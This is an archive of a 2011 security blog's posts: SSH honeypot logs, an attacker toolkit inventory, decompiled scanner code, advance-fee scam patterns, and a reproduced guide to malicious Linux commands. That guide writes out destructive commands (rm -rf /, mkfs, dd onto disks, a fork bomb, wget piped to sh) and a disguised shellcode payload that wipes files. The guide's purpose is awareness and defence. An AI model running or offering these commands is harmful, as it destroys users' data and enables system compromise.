peer-to-peer update distribution system for denition updates, instead of relying on decades-old primary/backup/tertiary denition distribution servers. After all, weve already perfected the technology through [2]BitTorrent, but it seems that technology is mostly perceived as being used for illegal purposes. When the original [3]Gnutella client was released, I was very excited. Not because it was a chance to obtain pirated music, but because it was innovative, and an exciting new way to distribute information and open source software. That was over 10 years ago. Peer-to-peer technology has drastically evolved in scalability and design, and yet has only been adopted by the games industry as a means of updating software (see [4]World of Warcraft P2P Updating). With a peer-to-peer update mechanism for antivirus and host intrusion detection, not only could detection updates be pushed across the network, but so could infection reports. Instant visibility across the network of the status of all systems connected to your peer-to-peer security network. Only one question remains. Why hasnt anything like this been implemented yet?
1. http://en.wikipedia.org/wiki/Conficker 2. http://en.wikipedia.org/wiki/BitTorrent_%28protocol%29 3. http://en.wikipedia.org/wiki/Gnutella 4. http://dynamicsubspace.net/2011/05/09/after-reinstall-watching-p2p-work-in-world-of-warcraft/
14
1.1. September
BlogBook
1.1.6
Anonymous
Plans
Day
of
Vengeance
to
Protest
Execution,
Arrests
(2011-09-23 02:00)
A massive cyber attack is planned for tomorrow, September 24. If your business could be a possible target, you might want to review your Disaster Recovery and Continuity of Operations plans, and be ready to enact them this weekend... From PCMag:
To avenge the Wednesday execution of Troy Davis, hacktivist group Anonymous has added the Atlanta Police Department to its list of targets for a nationwide cyber attack scheduled for this Saturday, September 24.
...
On Wednesday, Anonymous announced a Day of Vengeance starting at noon ET this Saturday, when aligned hackers would launch cyberattacks on targets like Wall Street, corrupt banking institutions, and the New York City Police Department.
Read more at [1]PCMag

1. http://www.pcmag.com/article2/0,2817,2393411,00.asp
1.1.7
Introducing the Scam Fund! (2011-09-24 01:53)
I have decided to begin tracking how much scammers are oering to give to me, and how much money in transaction fees are requested to obtain said funds. Currently, I have been promised over 20 million US Dollars. Please check out the Scam Fund page, which will be updated regularly. [1]Scam Fund
1. http://caffeinesecurity.blogspot.com/p/scam-fund.html
1.1.8
Research Project - Project Picnic Basket (2011-09-24 12:32)
Ive decided to start a second research project called Project Picnic Basket. This is of course a reference to Yogi Bears crazed attempts to obtain any and all picnic baskets. I have setup a SSH honeypot with a weak root password. The honeypot has no access to my internal network, and is actually a virtualized Linux system using [1]Kippo. Ive also setup a spam honeypot on this blog site using [2]Project Honey Pot. I will post any interesting results as I get them.
1. http://code.google.com/p/kippo/ 2. http://www.projecthoneypot.org/
15
BlogBook
1.1. September
1.1.9
Password Cracker Analysis (2011-09-25 14:39)
Well Im excited to say that just after a day of running Project Picnic Basket, Ive already had someone stumble upon my SSH server and crack the password. This was clearly an unintelligent cracker, which kept trying to crack the password after successfully cracking it. I have taken the passwords which were used in the cracking attempt and dumped them into a nice Google Docs spreadsheet: [1]Project Picnic Basket Cracked Passwords Is your password on there? I will update the list as I receive more crack attempts.
1. https://docs.google.com/spreadsheet/ccc?key=0AlZA4ubLZ4YKdC16XzVILVktYlFnT2padEVoYlVaRWc&hl=en_US
1.1.10
More password analysis (2011-09-26 18:18)
As more passwords are processed by my honeypot, Ive decided to publish the password list in cloud format in addition to the raw data. I feel this visualization is rather insightful, and shows interesting trends in password attempts. [1]Password Cloud Interestingly enough is the fact that the most attempted password is branburica. A [2]Google Search does not yield much info.
1. http://caffeinesecurity.blogspot.com/p/password-cloud.html 2. http://www.google.com/search?q=branburica
1.1.11
Solar Activity could cause severe issues (2011-09-26 22:23)
From [1]http://www.spaceweather.com/
STRONG SOLAR ACTIVITY: Having already unleashed two X-ares since Sept. 22nd, sunspot AR1302 appears ready for more. The active region has a complex beta-gamma-delta magnetic eld that harbors energy for strong [2]M- and X-class eruptions. Flares from AR1302 will become increasingly geoeective as the sunspot turns toward Earth in the days ahead. Strong solar activity could potentially cause severe disruptions in power grids world-wide, should a solar storm be observed similar to the one from [3]1859, in which Telegraph systems all over Europe and North America failed, in some cases even shocking telegraph operators.[4] Telegraph pylons threw sparks and telegraph paper spontaneously caught re.
1. http://www.spaceweather.com/ 2. http://www.spaceweather.com/glossary/flareclasses.html?PHPSESSID=n0l8vr738b2tjecshdd37aa1s1 3. http://en.wikipedia.org/wiki/Solar_storm_of_1859 4. http://en.wikipedia.org/wiki/Solar_storm_of_1859#cite_note-understandingsocietal-5
1.1.12
Listening to a Password Cracker (2011-09-27 21:26)
I used the P22.com Music Text Composition Generator to create music using attempted usernames and passwords I gathered during just one cracking attempt at my honeypot. The music is recorded at 2400 BPM using Lead 8 (bass + lead). 16
1.1. September
BlogBook
I feel the music has an electrifying video game feel to it. The purpose of this video is to raise online security awareness. I hope you enjoy it! [EMBED] [1]YouTube Link
1. http://www.youtube.com/watch?v=LfiGjotiAA4
1.1.13
Guide to Malicious Linux/Unix Commands (2011-09-30 12:21)
[1]UbuntuGuide.org has an excellent guide to [2]Malicious Linux/Unix Commands which may be observed on live systems or honeypots. Not only is it a good idea to monitor logs for attempts at using these commands, but it may also be a good idea to test your honeypot (especially if its a virtual machine) to see if these commands will damage/destroy your honeypot. Below is a current copy of the guide. It has already dissapeared from the Ubuntu forums, so I felt it would be a good idea to archive just in case. This article was originally published in Ubuntu Forums but has recently been removed there. Ubuntuguide feels that knowledge about these risks is more important than any misguided attempts to protect the public by hiding their potential dangers or protect the (K)Ubuntu/Linux image. The original article has therefore been re-created (and subsequently edited) here.) ATTENTION: It is worthwhile to have some basic awareness about malicious commands in Linux. Always be cautious when running one of these (or similar) commands (or downloaded scripts) that have been recommended as a solution to a problem you may have with your computer. It is also worthwhile to always enable a [3]screensaver with a password so that a casual passerby is not able to maliciously execute one of these commands from your keyboard while you are away from your computer. When in doubt as to the safety of a recommended procedure or command, it is best to verify the commands function from several sources, such as from readily available documentation on Linux commands (e.g. manpages). Here are some common examples of dangerous commands that should raise a red ag. Again, these are extremely dangerous and should not be attempted on any computer that has any physical connection to valuable data. Many of the commands and techniques will cause just as much damage from a LiveCD environment, as well. This is far from an exhaustive list, but should give some clues as to what kind of things people may try to trick you into doing. Remember these can always be disguised as some obfuscated command or as a part of a long procedure, so the bottom line is to take appropriate caution when executing something that just doesnt feel right. Delete all les, delete current directory, or delete visible les in current directory Its quite obvious why these commands can be dangerous to execute. rm means remove, -f means force deletion (even if write protected), and -r means do it recursively, i.e. all subfolders. Therefore, rm -rf / means force a deletion of everything in the root directory and all subfolders. rm -rf . means to force deletion of the current directory and all subfolders. rm -rf * means to force deletion of all les in the current folder and all subfolders. rm -rf /
17
BlogBook rm -rf . rm -rf *
1.1. September
Another variation of this, which would all force deletion of the current folder and all subfolders, would be: rm -r .[^.]*
which will only exclude the parent directory .. [4] Reformat Data on device Whatever follows the mkfs command will be destroyed and replaced with a blank lesystem. mkfs mkfs.ext3 mkfs.anything
[5] Block device manipulation These commands cause raw data to be written to a block device. Often this will clobber the lesystem and cause total loss of data: any_command > /dev/sda dd if=something of=/dev/sda
[6] Forkbomb Although perhaps intriguing and curiosity-provoking, these commands execute a huge number of processes until the system freezes, forcing a hard reset of the computer (which may cause data corruption, operating system damage, or other awful fate).
In Bourne-ish shells (like Bash): :(){:|:&};:
In Perl 18
1.1. September fork while fork
BlogBook
[7] Tarbomb Someone asks you to extract a tar archive into an existing directory. This tar archive can be crafted to explode into a million les, or can inject les into the system by guessing lenames. You should always decompress tar archives to a clean directory with nothing else in it. Only after determining that the extracted les are what was expected should the extracted les be copied to the nal target directory. [8] Decompression bombs Someone asks you to extract an archive which appears to be a small download. In reality its highly compressed data and will inate to hundreds of GBs, lling your hard drive. You should never download and extract any data, utility, or software from an untrusted source. [9] Malicious code in Shell scripts Someone gives you the link to a shell script (executable from the command line interface using script execution command ./ ) and recommends that you download and execute it. The script might contains any command whatsoever whether benign or malevolent. Never execute code from people you dont trust. Examples: wget http://some_place/some_file sh ./some_file
or wget http://some_place/some_file -O- | sh
[10] Malicious source code to be compiled then executed Someone gives you source code then tells you to compile it. It is easy to hide malicious code as a part of a large wad of source code, and source code gives the attacker a lot more creativity for disguising malicious payloads. Do not compile or execute the resulting compiled code unless the source is some well-known application obtained from a reputable site (i.e. SourceForge, the authors homepage, an Ubuntu address). A famous example of this was code that surfaced on a mailing list. It was disguised as a proof of concept sudo exploit. It was claimed that if you ran the code, sudo would grants root privileges without a shell (which is what the commands gksudo and kdesudo are for). In the downloaded code was this malicious payload:
19
BlogBook char esp[] __attribute__ ((section(".text"))) /* e.s.p release */ = "\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68" "\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99" "\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7" "\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56" "\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31" "\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69" "\x6e\x2f\x73\x68\x00\x2d\x63\x00" "cp -p /bin/sh /tmp/.beyond; chmod 4755 /tmp/.beyond;";
1.1. September
To the new or even somewhat experienced computer user, this looks like the hex code gibberish stu that is so typical of a safe proof-of-concept. However, this actually runs
rm -rf ~ / &
which will destroy your home directory as a regular user, or all les if you are logged in as root. If you were able to recognize commands in hex string format, you would already be such an expert user that you would never run such untrusted code. But for the rest of us, we must remember that malicious code comes in many novel forms be wary about installing code that you know nothing about and the source of which you dont absolutely trust. Here is another monstrous example (in Python) that no self-respecting programmer or user would ever execute:
python -c import os; os.system("".join([chr(ord(i)-1) for i in "sn!.sg!+"]))
in which sn!.sg!+ is simply the rm -rf * command shifted a character up in order to disguise it from casual examination. I wouldnt expect anyone with experience in Python to be foolish enough to paste this monstrous thing into their terminal without suspecting something might be wrong, but how many casual users are uent in Python?
1. http://www.ubuntuguide.org/ 2. http://ubuntuguide.org/wiki/Malicious_Linux_Commands 3. http://ubuntuguide.org/wiki/Ubuntu:All#Screensavers 4. about:blank 5. about:blank 6. about:blank 7. about:blank 8. about:blank 9. about:blank 10. about:blank
20
1.2. October
BlogBook
1.1.14
Ducati Motorcycle Default Password Vulnerability. (2011-09-30 12:42)
Theres an interesting vulnerability writeup at [1]osvdb.org detailing how to gain unauthorized access to a [2]Ducati Motorcycle using the default ignition password. Apparently by default the ignition password is set to the last 4 digits of the motorcycles VIN number.
1. http://osvdb.org/ 2. http://osvdb.org/show/osvdb/75811
1.2
1.2.1
October
Flash Drives: Helping Spread Malware since Y2K (2011-10-05 03:00)
Flash drives are an ever growing threat in the computer industry. They are quickly becoming one of the most targeted infection methods for malware. Does your organization have a policy to address the vulnerabilities associated with USB Flash Drives? In this case, [1]Dilbert says it best. See Also: [2]ENISA USB Flash Drive Whitepaper hosted by Sandisk
1. http://www.dilbert.com/2011-09-29/ 2. http://www.sandisk.com/media/226716/enisa-whitepaper.pdf
1.2.2
A look at a simple SSH probe and password crack (2011-10-05 22:05)
Heres an annotated look at how an attacker using a SSH password cracker compromises servers.
First the attacker probes to see if SSH is accepting connections. Most likely the scanner also attempted to ngerprint the IP address to identify the operating system. This is most likely an automated process on a compromised system. 2011-10-05 05:08:56-0400 [kippo.core.honeypot.HoneyPotSSHFactory] New connection: 221.176.11.13:35868 (192.168.1.165:22) [session: 0] 2011-10-05 05:08:56-0400 [HoneyPotTransport,0,221.176.11.13] connection lost Next the attacker begins attempting to crack the SSH password for the root user. Once again these attempts are automated, and use a cracking tool which is based upon SSH-2.0-libssh-0.11.
2011-10-05 05:30:40-0400 [kippo.core.honeypot.HoneyPotSSHFactory] New connection: 221.176.11.13:57366 (192.168.1.165:22) [session: 1] 2011-10-05 05:30:41-0400 [HoneyPotTransport,1,221.176.11.13] Remote SSH version: SSH-2.0libssh-0.11 2011-10-05 05:30:41-0400 [HoneyPotTransport,1,221.176.11.13] kex alg, key alg: die-hellmangroup1-sha1 ssh-rsa 2011-10-05 05:30:41-0400 [HoneyPotTransport,1,221.176.11.13] outgoing: aes256-cbc hmac-sha1 none 2011-10-05 05:30:41-0400 [HoneyPotTransport,1,221.176.11.13] incoming: aes256-cbc hmac-sha1 none
21
BlogBook
1.2. October
2011-10-05 05:30:41-0400 [HoneyPotTransport,1,221.176.11.13] NEW KEYS 2011-10-05 05:30:42-0400 [HoneyPotTransport,1,221.176.11.13] starting service ssh-userauth 2011-10-05 05:30:42-0400 [SSHService ssh-userauth on HoneyPotTransport,1,221.176.11.13] root trying auth keyboard-interactive 2011-10-05 05:30:43-0400 [SSHService ssh-userauth on HoneyPotTransport,1,221.176.11.13] login attempt [root/root123] failed 2011-10-05 05:30:43-0400 [SSHService ssh-userauth on HoneyPotTransport,1,221.176.11.13] root failed auth keyboard-interactive 2011-10-05 05:30:43-0400 [SSHService ssh-userauth on HoneyPotTransport,1,221.176.11.13] unauthorized login: 2011-10-05 05:30:43-0400 [SSHService ssh-userauth on HoneyPotTransport,1,221.176.11.13] root trying auth password 2011-10-05 05:30:43-0400 [SSHService ssh-userauth on HoneyPotTransport,1,221.176.11.13] login attempt [root/root123] failed 2011-10-05 05:30:44-0400 [-] root failed auth password 2011-10-05 05:30:44-0400 [-] unauthorized login: 2011-10-05 05:30:44-0400 [HoneyPotTransport,1,221.176.11.13] Got remote error, code 11 reason: Bye Bye 2011-10-05 05:30:44-0400 [HoneyPotTransport,1,221.176.11.13] connection lost 2011-10-05 05:30:55-0400 [kippo.core.honeypot.HoneyPotSSHFactory] New connection: 221.176.11.13:60753 (192.168.1.165:22) [session: 2] 2011-10-05 05:30:55-0400 [HoneyPotTransport,2,221.176.11.13] Remote SSH version: SSH-2.0libssh-0.11 2011-10-05 05:30:55-0400 [HoneyPotTransport,2,221.176.11.13] kex alg, key alg: die-hellmangroup1-sha1 ssh-rsa 2011-10-05 05:30:55-0400 [HoneyPotTransport,2,221.176.11.13] outgoing: aes256-cbc hmac-sha1 none 2011-10-05 05:30:55-0400 [HoneyPotTransport,2,221.176.11.13] incoming: aes256-cbc hmac-sha1 none 2011-10-05 05:30:56-0400 [HoneyPotTransport,2,221.176.11.13] NEW KEYS 2011-10-05 05:30:56-0400 [HoneyPotTransport,2,221.176.11.13] starting service ssh-userauth 2011-10-05 05:30:57-0400 [SSHService ssh-userauth on HoneyPotTransport,2,221.176.11.13] root trying auth keyboard-interactive 2011-10-05 05:30:57-0400 [SSHService ssh-userauth on HoneyPotTransport,2,221.176.11.13] login attempt [root/123456] succeeded 2011-10-05 05:30:57-0400 [SSHService ssh-userauth on HoneyPotTransport,2,221.176.11.13] root authenticated with keyboard-interactive 2011-10-05 05:30:57-0400 [SSHService ssh-userauth on HoneyPotTransport,2,221.176.11.13] starting service ssh-connection 2011-10-05 05:30:57-0400 [HoneyPotTransport,2,221.176.11.13] Got remote error, code 11 reason: Bye Bye 2011-10-05 05:30:57-0400 [HoneyPotTransport,2,221.176.11.13] connection lost 2011-10-05 05:31:45-0400 Once the SSH password has been cracked, the attacker connects manually from another IP address, most likely his/her system. Note that the attacker is using Putty, indicating he/she is using a Windows system. [kippo.core.honeypot.HoneyPotSSHFactory] (192.168.1.165:22) [session: 3] 22 New connection: 2.192.102.247:50155
1.2. October
BlogBook
2011-10-05 05:31:46-0400 [HoneyPotTransport,3,2.192.102.247] Remote SSH version: SSH-2.0PuTTY Release 0.61 2011-10-05 05:31:46-0400 [HoneyPotTransport,3,2.192.102.247] kex alg, key alg: die-hellmangroup1-sha1 ssh-rsa 2011-10-05 05:31:46-0400 [HoneyPotTransport,3,2.192.102.247] outgoing: aes256-ctr hmac-sha1 none 2011-10-05 05:31:46-0400 [HoneyPotTransport,3,2.192.102.247] incoming: aes256-ctr hmac-sha1 none 2011-10-05 05:31:48-0400 [HoneyPotTransport,3,2.192.102.247] NEW KEYS 2011-10-05 05:31:48-0400 [HoneyPotTransport,3,2.192.102.247] starting service ssh-userauth 2011-10-05 05:31:50-0400 [SSHService ssh-userauth on HoneyPotTransport,3,2.192.102.247] root trying auth none 2011-10-05 05:31:50-0400 [SSHService ssh-userauth on HoneyPotTransport,3,2.192.102.247] root trying auth keyboard-interactive 2011-10-05 05:31:55-0400 [SSHService ssh-userauth on HoneyPotTransport,3,2.192.102.247] login attempt [root/123456] succeeded 2011-10-05 05:31:55-0400 [SSHService ssh-userauth on HoneyPotTransport,3,2.192.102.247] root authenticated with keyboard-interactive 2011-10-05 05:31:55-0400 [SSHService ssh-userauth on HoneyPotTransport,3,2.192.102.247] starting service ssh-connection 2011-10-05 05:31:55-0400 [SSHService ssh-connection on HoneyPotTransport,3,2.192.102.247] got channel session request Finally the attacker performs several simple commands to identify the operating system, then disconnects, recording the compromised systems for future use. 2011-10-05 05:31:55-0400 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,3,2.192.102.247] channel open 2011-10-05 05:31:56-0400 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,3,2.192.102.247] pty request: xterm (24, 80, 0, 0) 2011-10-05 05:31:56-0400 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,3,2.192.102.247] Terminal size: 24 80 2011-10-05 05:31:56-0400 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,3,2.192.102.247] getting shell 2011-10-05 05:31:56-0400 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,3,2.192.102.247] Opening TTY log: log/tty/20111005-053156-9094.log 2011-10-05 05:31:57-0400 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,3,2.192.102.247] /etc/motd resolved into /etc/motd 2011-10-05 05:31:57-0400 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,3,2.192.102.247] /var/run/motd resolved into /var/run/motd 2011-10-05 05:32:01-0400 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,3,2.192.102.247] CMD: uptime 2011-10-05 05:32:01-0400 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,3,2.192.102.247] Command found: uptime 2011-10-05 05:32:05-0400 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,3,2.192.102.247] CMD: uname -a 2011-10-05 05:32:05-0400 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,3,2.192.102.247] Command found: uname -a 2011-10-05 05:32:37-0400 [HoneyPotTransport,3,2.192.102.247] connection lost
23
BlogBook
1.2. October
Ill keep an eye out for future attempts to use this honeypot from that IP address for malicious purposes. Hopefully Ill get some interesting results. Some interesting info on the attackers real IP address: http://network-tools.com/default.asp?prog=express &host=2.192.102.247
% Information related to 2.192.0.0 - 2.195.255.255 inetnum: 2.192.0.0 - 2.195.255.255 netname: TIM-NET descr: Telecom Italia Mobile descr: Service Provider country: IT
It appears our attacker is using a mobile phone as his internet connection. Related Reading: [1][2]Best Practices for Enterprise Network Security This paper discusses aligning security policies to correspond with the priorities of business assets, establishing security proles for users and all the types of devices accessing your network, and creating online self-service centers for users.
1. http://www.blogger.com/post-edit.g?blogID=8334696259846048585&postID=409961738802624638&from=pencil 2. http://caffinesecurity-blogspot.tradepub.com/free-offer/best-practices-for-enterprise-network-security/w_ aaaa1617
1.2.3
Whats in a hackers toolkit? (2011-10-11 20:45)
An attacker recently gained access to my honeypot, and began uploading hack tools using wget. While his hack tools did not actually infect anything, I retained a copy for evaluation, and even gained access to his FTP server which contained all of his tools. The available tools in this attackers bag of tricks is quite interesting.
[1] The attackers rst tool in his/her bag of tricks is a simple Linux virus (light.tgz) designed to infect binaries in the /bin folder of the system, called [2]Linux/Rst.a According to VirusTotal, this virus has a [3]74 % detection rate. Accompanying this virus is a le called inst. This le contains a shell script which sets conguration settings for connecting to multiple IRC servers and joining a specic IRC channel, which acts as a command and control center for the now infected system. Rst.a isnt the only tool in the attackers toolkit. Lets take a look at a few other les:
biz.tgz - [4]72.1 % detected by VirusTotal, the B variant of the Rst virus above (Rst.b). hecaru.rar - [5]72.1 % detected by VirusTotal, a [6]DDoS attack bot 24
1.2. October
BlogBook
ActivWin2008R2.zip - [7]32.6 % detected by VirusTotal, a hack tool which apparently allows the user to use a pirated copy of Windows perpetually, but most likely also installs additional, malicious, software. vnc.tgz - [8]16.3 % detected by VirusTotal, a copy of the attackers SSH scan tool cacat.tgz - [9]67.4 % detected by VirusTotal, another version of the SSH scan tool shony.tgz - [10]18.6 % detected by VirusTotal, a backdoor/trojan IRC bot zmeu conguration les, part of the attackers botnet An iso of (Russian?) version of Win 2k8 R2 Finally, a couple very interesting les which are being forwarded to AV vendors for analysis... The le i has a [11]4.7 % detection rate on VirusTotal, and its actual intentions are unknown. The le is 2.51 MB, rather large for your usual virus. The le f.jpg has a [12]7 % detection rate on VirusTotal, and once again its intentions are unknown. The IP address of this attacker is 188.76.246.77, which originates from Spain.
1. http://3.bp.blogspot.com/-00JaJWIClTI/TpTZD7cKPEI/AAAAAAAAAGg/QEkGQ33FKDs/s1600/hacktoolkit.png 2. http://www.mcafee.com/threat-intelligence/malware/default.aspx?id=99978 3. 4. 5. 6. 7. 8. 9. 10. 11. 12. http://www.virustotal.com/file-scan/report.html?id= http://www.virustotal.com/file-scan/report.html?id= http://www.virustotal.com/file-scan/report.html?id= http://www.microsoft.com/security/portal/Threat/Encyclopedia/Entry.aspx?Name=DoS%3APerl%2FUDPFlood. http://www.virustotal.com/file-scan/report.html?id= http://www.virustotal.com/file-scan/report.html?id= http://www.virustotal.com/file-scan/report.html?id= http://www.virustotal.com/file-scan/report.html?id= http://www.virustotal.com/file-scan/report.html?id= http://www.virustotal.com/file-scan/report.html?id= b1072d23d47519728b24d1191fafb8a515ed16e38e5a23c2f8463942006ae388-1294945727 9fd7ef49dd26c24a7619e4e00b4c162efbd8d3a286d1c5976819dcc70f8f98cc-1318379056 dbfe5e25fdbdece83687c2b361364c14adf08ab1b7ee328d71c8071724e90584-1318374066 A&ThreatID=-2147328293 da954fdc04142815e4233edd487e412773198fd49224e3a98133fdc6b5ac97ef-1318374779 90e5952a04923107f57804cc089f2e806493a343ca9642a186bf8adc7e3bf596-1318378879 f242567d4cbf090988fa28ec198bc1c4b69c749fb9b38fe108e69ede29368688-1318379559 3aee2b4fa97d97d26f74341d83c00a082959e8692259837791c6aac8961392ef-1318379055 5533cb176eb7a5cd9eda6af2bf7cd62a87e6c2a024423f111c372a29fa6622a5-1318376172 3f963a4fa1d35bc69a1563eef87c5f042c0f34fff7fd57341cc7fc568e21a90e-1318379242
1.2.4
Netscape 8? Really? (2011-10-12 17:00)
I was browsing my demographics for target audience, and was VERY shocked by seeing Netscape 8 as one of the browsers someone was using to read this security blog. The last update for Netscape 8 was in [1]2007... I hate to imagine how many vulnerabilities that browser has. I counted over 20 unpatched vulnerabilities at the [2]SecurityFocus Vulnerability Database If youre the person visiting my blog using Netscape...please...upgrade.
25
BlogBook
1.2. October
[3]
1. http://en.wikipedia.org/wiki/Netscape_Browser 2. http://www.securityfocus.com/bid 3. http://1.bp.blogspot.com/-CPPKDCLaT1A/TpW_DqxXvVI/AAAAAAAAAGo/y8RL-RxncEI/s1600/ns8wtf.PNG
1.2.5
Mystery Malware Examined (2011-10-12 18:54)
In a previous post, I looked inside a hackers toolkit, and found two mystery les, i and f. Analysis of these les has revealed that these les were both Linux executables. In addition to forwarding these les to AV vendors, I am analyzing these les myself. Using decompile-it.com, I was able to retrieve source code for i, and limited source for f. i (with is [1]4.7 % detection rate) was compiled in debug mode, and contains three source les. It appears to be some sort of SSH scanner. Unfortunately its been a while since I programmed, so if anyone can shed some light on what this code does, please post a comment. Auth.c:
#include "auth.c.h" static char *keys_path[5] = { 0, "%s/.ssh/identity", "%s/.ssh/id_dsa", "%s/.ssh/id_rsa", 0 }; static char *pub_keys_path[5] = { 0, "%s/.ssh/identity.pub", "%s/.ssh/id_dsa.pub", "%s/.ssh/id_rsa.pub", 0 }; int ask_userauth( SSH_SESSION *session ) { if ( session->auth_service_asked == 0 && ssh_service_request( session, "ssh-userauth" ) == 0 ) { session->auth_service_asked++; } return 0; } void burn( char *ptr ) { if ( ptr ) { 26
1.2. October ( ptr ); } return; } int wait_auth_status( SSH_SESSION *session, int kbdint ) { int err; /* phantom */ int cont; STRING *can_continue; u8 partial = 0; char *c_cont;
BlogBook
channels.c:
#include "channels.c.h" CHANNEL *channel_new( SSH_SESSION *session ) { int ebx; int edi; /* phantom */ CHANNEL *channel; memset( malloc( 72 ), 0, 72 ); *(int*)malloc( 72 )/*.8*/ = session->error.error_code; *(int*)malloc( 72 )/*.64*/ = session->version; *(int*)malloc( 72 )/*.52*/ = buffer_new( ); *(int*)malloc( 72 )/*.56*/ = buffer_new( ); if ( *(int*)(malloc( 72 ) + 8 + 1212) == 0 ) { session->channels = malloc( ( 1 ) * sizeof( CHANNEL ) ); *(int*)malloc( 72 )/*.4*/ = malloc( 72 ); } *(int*)malloc( 72 )/*.4*/ = *(int*)(malloc( 72 ) + 8 + 1212); *(int*)(malloc( 72 )) = *(int*)(*(int*)(malloc( 72 ) + 8 + 1212)); *(int*)(*(int*)(malloc( 72 )) + 4) = malloc( 72 ); return *(int*)(malloc( 72 )) + 4; } u32 ssh_channel_new_id( SSH_SESSION *session ) { session->maxchannel++; return session->maxchannel; }
client.c:
#include "client.c.h" char *ssh_get_banner( SSH_SESSION *session )

27
BlogBook { char buffer[128]; int i = 0; do { if ( session->fd < 0 || read( session->fd, buffer, 1 ) <= 0 ) { ssh_set_error( (void*)session, 2, "Remote host closed connection" ); return 0; } if ( buffer[0] != \r ) { if ( ebx == \n ) { buffer[ i ] = 0; return strdup( buffer ); } i++; } else { i++; buffer[0] = 0; if ( i + 1 == 127 )
1.2. October
Unfortunately f (with its [2]7 % detection rate) was not compiled in debug mode, and can not be as easily examined. However, its purpose can be inferred by the char arrays (strings) which are contained within the program:
// Minimal support for non-debug binary... char _fp_hw[]; char _IO_stdin_used[]; char esel[]; char initial_perm[]; char BITMASK[]; char longmask[]; char rots[]; char pc1[]; char bytemask[]; char pc2[]; char perm32[]; char final_perm[]; char sbox[]; char any_descr[]; char _nl_C_name[]; char pcap_version_string[]; char charmap[]; 28
1.2. October char char char char char char char char _dl_out_of_memory[]; map[]; yy_ec[]; yy_accept[]; yy_def[]; yy_meta[]; yy_base[]; yy_chk[];
BlogBook
Based upon the pcap version string I believe it may be safe to say that f is a packet snier of some sort.
1. 2. http://www.virustotal.com/file-scan/report.html?id= http://www.virustotal.com/file-scan/report.html?id= 5533cb176eb7a5cd9eda6af2bf7cd62a87e6c2a024423f111c372a29fa6622a5-1318376172 3f963a4fa1d35bc69a1563eef87c5f042c0f34fff7fd57341cc7fc568e21a90e-1318379242
1.2.6
A look at the various advance fee fraud methods... (2011-10-13 02:00)
As part of my continuing To Catch a Scammer project, Ive decided to begin analyzing various advance fee frauds. Covered in this post: Lottery/Contest Scam Money Laundering Scam Inheritance Donation Scam Lottery/Contest Scam One of the most common advance fee fraud scams I have seen is the Lottery or Contest scam. In this scam, the recipient receives an email from a lottery, sweepstakes, or contest, congratulating the recipient on their winning. Common faked senders:
Major corporations such as CocaCola, Microsoft, Yahoo!, or Google Foreign Country Government Agencies Foreign News Corporations Common winnings amounts:
Anywhere between $1,000,000 and $5,000,000 USD. How it works:
1. Victim receives notication of winnings 2. Victim replies to scammer with requested personal information 3. Scammer replies with contact information for fake bank/agency to claim winnings
29
BlogBook 4. Victim contacts fake bank/agency to claim winnings
1.2. October
5. Fake bank/agency replies with delivery fees, transfer fees, etc. which are needed from victim prior to receiving winnings Money Laundering Scam Another common advance fee fraud scam method is the money laundering scam. In this scam, the victim receives an email from a person who has access to a secret account from which they can not draw funds directly, but require the assistance of a their party to move the funds out of country. For helping them do this, the victim is oered a percentage of the amount being transferred. Common faked senders:
Oil tycoon Investment banker Common award amount:
Usually 40-50 % of various monetary amounts, ranging from $10,000,000 to $50,000,000 How it works:
1. Victim receives notication of proposed arrangement 2. Victim replies to scammer with requested personal information 3. Scammer replies with contact information for fake bank to begin fund transfer 4. Victim contacts fake bank to begin transfer 5. Fake bank replies with minimum deposit for new account, delivery fees, transfer fees, etc. which are needed from victim prior to receiving funds 6. Victim may also be requested to provide funds for bribes, legal fees, etc. Inheritance Donation Scam Similar to the Money Laundering common advance fee fraud scam method is the inheritance donation scam. In this scam, the victim receives an email from a dying person who has no heirs to pass their inheritance on to, and wishes to donate their inheritance to charity. For helping them do this, the victim is oered a percentage of the amount being transferred. Common faked senders:
Widow of a rich oil tycoon Widow of a rich investment banker Common award amount: 30
1.3. November
BlogBook
Anywhere from 10 to 40 % of various monetary amounts, ranging from $10,000,000 to $50,000,000 How it works:
1. Victim receives notication of proposed arrangement 2. Victim replies to scammer with requested personal information 3. Scammer replies with contact information for fake bank to begin fund transfer 4. Victim contacts fake bank to begin transfer 5. Fake bank replies with minimum deposit for new account, delivery fees, transfer fees, etc. which are needed from victim prior to receiving funds
1.2.7
BUSTED! (2011-10-17 18:22)
The password cracker script kiddies cant resist my picnic basket... Today an attacker with a SSH brute force script accidentally showed his hand by connecting to my honeypot from his [1]own system shortly after stopping his scan from his [2]compromised system. Unlike my previous, um, visitor, this attacker seems to have very few tricks up his sleeve. He attempted to upload something to my honeypot through sftp. Unsuccessful, he abandoned his attempts. Todays guest is from Romania, and seems to prefer to scan using compromised systems in Germany to prevent his IP from being immediately reported for conducting port scans. Much like other attackers, he shows that he is using his Windows system through the client version string PuTTY-Release-0.53b. A notication email has been sent to both ISPs to report the attacker, as well as his compromised system being used for scanning. Original Log: [3]Kippo-Mon 10172011.log
1. http://network-tools.com/default.asp?prog=express&host=79.112.215.36 2. http://network-tools.com/default.asp?prog=express&host=85.131.247.53 3. https://docs.google.com/leaf?id=0B1ZA4ubLZ4YKODNjOWI4NTgtN2IwNC00YzEyLWEyYTYtYmRlYTFmNjI2NmJh&hl=en_US
1.3
1.3.1
November
The Lottery Scam - Jeanis Story (2011-11-07 22:33)
